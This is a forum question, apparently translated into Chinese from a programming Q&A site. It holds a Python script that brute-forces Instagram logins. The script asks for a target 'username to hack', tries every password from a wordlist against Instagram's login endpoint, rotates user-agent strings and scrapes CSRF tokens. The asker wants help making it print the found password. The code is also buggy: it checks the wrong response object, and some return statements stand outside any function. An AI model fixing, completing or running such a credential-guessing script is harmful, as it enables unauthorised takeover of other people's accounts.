带有请求和bs4的Bruteforce Instagram

Question

因此，我尝试使用Requests和Bs4（使用单词列表中的所有密码登录）制作一个Instagram Bruteforce脚本。我无法打印正确的密码。当使用正确的密码时，循环仍然不会中断。我知道代码应该很快就会工作，因为我设法使用这种方法正常登录。但是现在，由于我试图制作一个蛮力脚本（为了好玩），所以它不起作用。如果有人可以帮助我弄清楚如何使循环中断并打印（“ Password is：” + PASSWD）。我是python btw的新手。代码在函数btw中，但是我没有在这里显示它，只是为了让你们知道为什么有时会说“ return main（）”等。这是代码：

from bs4 import BeautifulSoup
import json, random, re, requests

USERNAME = input("# - Username to hack ~ ")
if USERNAME == "":
    print("Please enter a valid username\nRestarting...")
    time.sleep(2)
    return main()
file = input("# - Wordlist Path ~ ")
question = input("# - Is the information above correct?(y/n) ~ ")
if question == "y" or question == "Y":
    passfile = open(file, 'r')
elif question == "n" or question == "N":
    return main()
else:
    print("That's not a valid option lol\nNow we will restart")
    time.sleep(3)
    return start()
wordlist = passfile.readlines()
BASE_URL = 'https://www.instagram.com/accounts/login/'
LOGIN_URL = BASE_URL + 'ajax/'

for PASSWD in wordlist:

    headers_list = [
            "Mozilla/5.0 (Windows NT 5.1; rv:41.0) Gecko/20100101"\
            " Firefox/41.0",
            "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2)"\
            " AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2"\
            " Safari/601.3.9",
            "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0)"\
            " Gecko/20100101 Firefox/15.0.1",
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"\
            " (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36"\
            " Edge/12.246"
            ]



    USER_AGENT = headers_list[random.randrange(0,4)]

    session = requests.Session()
    session.headers = {'user-agent': USER_AGENT}
    session.headers.update({'Referer': BASE_URL})
    req = session.get(BASE_URL)
    soup = BeautifulSoup(req.content, 'html.parser')
    body = soup.find('body')

    pattern = re.compile('window._sharedData')
    script = body.find("script", text=pattern)

    script = script.get_text().replace('window._sharedData = ', '')[:-1]
    data = json.loads(script)

    csrf = data['config'].get('csrf_token')

    login_data = {'username': USERNAME, 'password': PASSWD}
    session.headers.update({'X-CSRFToken': csrf})
    try:
        login = session.post(LOGIN_URL, data=login_data, allow_redirects=True)
        if req.history:
            print("Password is: " + PASSWD)
            for resp in req.history:
                print("Password is: " + PASSWD)
                if resp.url == "https://www.instagram.com" or resp.url == "https://www.instagram.com/" + USERNAME:
                    print("Password is: " + PASSWD)
                    break

                else:
                    print("Trying pass: " + PASSWD)


        else:
            print("Trying pass: " + PASSWD)

    except:
        print("Trying pass: " + PASSWD)